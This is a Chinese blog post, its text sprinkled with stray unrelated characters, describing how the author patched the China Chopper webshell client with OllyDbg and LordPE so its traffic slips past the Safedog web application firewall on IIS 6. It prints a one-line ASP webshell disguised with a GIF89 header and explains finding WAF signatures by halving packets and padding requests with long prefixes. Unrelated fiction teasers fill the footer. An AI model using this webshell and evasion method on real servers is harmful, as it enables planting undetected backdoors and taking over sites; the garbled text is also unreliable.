逆向修改菜刀過安全狗

首發(fā):逆向修改菜刀過安全狗

引子

文章是去年寫的楷拳,現在菜刀過狗也不是很難了趣斤,只是做一個逆向修改菜刀的演示俩块。

環(huán)境:Windows2003
中間件:iis6.0
安全狗版本:安全狗iis枸杞版3.5
菜刀:chopper.exe md5: e2caee9b7844ea06d964ad138d1da1f9
工具:吾愛破解專用版Ollydbg,LordPE浓领,C32ASM

嘗試

主要是為了繞過安全狗的一句話檢測玉凯,開啟這個就行了。


在IIS目錄放一句話木馬联贩。

GIF89
<%eval request("1")%>

最普通的那種漫仆,并沒有各種亂七八糟的變形之類的。
通過瀏覽器訪問泪幌。


正常的盲厌,并沒有被攔截。添加到菜刀列表祸泪,訪問試試看吗浩。

通過菜刀訪問,被安全狗攔截了没隘,打開fiddler看看封包懂扼。


分析修改

因為以前做過免殺,所以最早的時候沒有各種工具可以定位右蒲,我是通過OD的一半一半法來定位被查殺的位置阀湿。
AAAAAAAAAAAAAAABBAAAAAAAAAAAAAAA
我當時的想法是,能不能運用在過WAF上瑰妄,先把特征碼對半炕倘,然后慢慢對被檢測的補位進行定位。


去掉一般的封包重發(fā)翰撑,還是被攔截罩旋,看來特征在前半段。


已經沒有被攔截的提示眶诈,但是程序也是報錯了涨醋,畢竟代碼不完整,于是我想到了之前過安全狗的SQL注入是通過加很長很長的字符逝撬,然后就能繞過SQL注入檢測浴骂,那么如果我給這段封包加很長的字符是不是也可以繞過。


通過增加很長的前綴宪潮,就過掉了安全狗溯警,但是如果我每個封包都這樣攔截修改是不是太麻煩了趣苏。于是我想到了通過OD修改。


原版的菜刀并沒有加殼梯轻,可以直接修改食磕,打開OD查看下字符串。


這個位置是ASP的原版字符串喳挑,通過這里修改就可以修改他的發(fā)包彬伦,但是因為需要增加的長多比較大,所以原程序并沒有那么大的空地址段給我寫伊诵,要自己另外增加區(qū)段单绑。
上C32,新建一個文件曹宴,然后把前面的字符加進來搂橙。


區(qū)段做好了,然后用PEid把區(qū)段加到程序里笛坦。


然后通過OD修改区转,字符串偏移位置。


這里是004ab000


保存下文件弯屈,然后用fiddler抓包查看是否天然帶我們的字符串。


通過修改發(fā)包已經天然帶字符串恋拷,當然不止修改一個地方资厉,要完成ASP完成可用要修改好幾處位置。

總結

剛開始我認為這些waf是完美的蔬顾,后來我發(fā)現宴偿,這些防火墻有些類似于早點的殺毒軟件,通過特征庫來攔截诀豁,只要找對特征窄刘,就可以對癥下藥,不同品牌的防火墻規(guī)則不同舷胜,但是換湯不換藥基本都是這樣的套路娩践,兵來將敵水來土堰靠規(guī)則并不靠譜,修改web程序中的漏洞才是關鍵烹骨,過度依賴防火墻并不能很好的保護網站翻伺。
jsp與php 版過防火墻:PyCmd 加密隱形木馬

最后編輯于
?著作權歸作者所有,轉載或內容合作請聯系作者
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市沮焕,隨后出現的幾起案子吨岭,更是在濱河造成了極大的恐慌,老刑警劉巖峦树,帶你破解...
    沈念sama閱讀 218,122評論 6 505
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件辣辫,死亡現場離奇詭異旦事,居然都是意外死亡,警方通過查閱死者的電腦和手機急灭,發(fā)現死者居然都...
    沈念sama閱讀 93,070評論 3 395
  • 文/潘曉璐 我一進店門姐浮,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人化戳,你說我怎么就攤上這事单料。” “怎么了点楼?”我有些...
    開封第一講書人閱讀 164,491評論 0 354
  • 文/不壞的土叔 我叫張陵扫尖,是天一觀的道長。 經常有香客問我掠廓,道長换怖,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 58,636評論 1 293
  • 正文 為了忘掉前任蟀瞧,我火速辦了婚禮沉颂,結果婚禮上,老公的妹妹穿的比我還像新娘悦污。我一直安慰自己铸屉,他們只是感情好,可當我...
    茶點故事閱讀 67,676評論 6 392
  • 文/花漫 我一把揭開白布切端。 她就那樣靜靜地躺著彻坛,像睡著了一般。 火紅的嫁衣襯著肌膚如雪踏枣。 梳的紋絲不亂的頭發(fā)上昌屉,一...
    開封第一講書人閱讀 51,541評論 1 305
  • 那天,我揣著相機與錄音茵瀑,去河邊找鬼间驮。 笑死,一個胖子當著我的面吹牛马昨,可吹牛的內容都是我干的竞帽。 我是一名探鬼主播,決...
    沈念sama閱讀 40,292評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼鸿捧,長吁一口氣:“原來是場噩夢啊……” “哼抢呆!你這毒婦竟也來了?” 一聲冷哼從身側響起笛谦,我...
    開封第一講書人閱讀 39,211評論 0 276
  • 序言:老撾萬榮一對情侶失蹤抱虐,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后饥脑,有當地人在樹林里發(fā)現了一具尸體恳邀,經...
    沈念sama閱讀 45,655評論 1 314
  • 正文 獨居荒郊野嶺守林人離奇死亡懦冰,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內容為張勛視角 年9月15日...
    茶點故事閱讀 37,846評論 3 336
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現自己被綠了谣沸。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片刷钢。...
    茶點故事閱讀 39,965評論 1 348
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖乳附,靈堂內的尸體忽然破棺而出内地,到底是詐尸還是另有隱情,我是刑警寧澤赋除,帶...
    沈念sama閱讀 35,684評論 5 347
  • 正文 年R本政府宣布阱缓,位于F島的核電站,受9級特大地震影響举农,放射性物質發(fā)生泄漏荆针。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 41,295評論 3 329
  • 文/蒙蒙 一颁糟、第九天 我趴在偏房一處隱蔽的房頂上張望航背。 院中可真熱鬧,春花似錦棱貌、人聲如沸玖媚。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,894評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽今魔。三九已至,卻和暖如春起惕,著一層夾襖步出監(jiān)牢的瞬間涡贱,已是汗流浹背咏删。 一陣腳步聲響...
    開封第一講書人閱讀 33,012評論 1 269
  • 我被黑心中介騙來泰國打工惹想, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人督函。 一個月前我還...
    沈念sama閱讀 48,126評論 3 370
  • 正文 我出身青樓嘀粱,卻偏偏與公主長得像,于是被迫代替她去往敵國和親辰狡。 傳聞我的和親對象是個殘疾皇子锋叨,可洞房花燭夜當晚...
    茶點故事閱讀 44,914評論 2 355

推薦閱讀更多精彩內容